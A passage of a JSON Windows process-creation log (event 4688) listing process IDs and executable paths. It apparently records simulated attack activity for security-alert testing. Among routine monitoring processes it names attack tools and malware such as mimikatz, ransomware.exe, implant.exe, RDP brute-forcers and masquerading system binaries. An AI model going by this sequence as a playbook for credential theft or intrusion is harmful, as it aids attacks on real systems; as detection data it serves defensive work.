,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft 